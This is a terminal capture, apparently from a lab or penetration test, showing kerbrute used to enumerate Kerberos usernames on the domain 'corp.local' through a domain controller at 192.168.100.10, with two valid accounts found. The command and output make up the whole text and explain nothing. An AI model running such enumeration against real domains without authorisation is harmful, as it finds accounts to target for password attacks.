└─$ kerbrute userenum users_for_brute.txt \
  -d corp.local \
  --dc 192.168.100.10

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/18/25 - Ronnie Flathers @ropnop

2025/12/18 09:35:29 >  Using KDC(s):
2025/12/18 09:35:29 >   192.168.100.10:88

2025/12/18 09:35:29 >  [+] VALID USERNAME:       administrator@corp.local
2025/12/18 09:35:29 >  [+] VALID USERNAME:       intern1@corp.local
2025/12/18 09:35:29 >  Done! Tested 12 usernames (2 valid) in 0.025 seconds
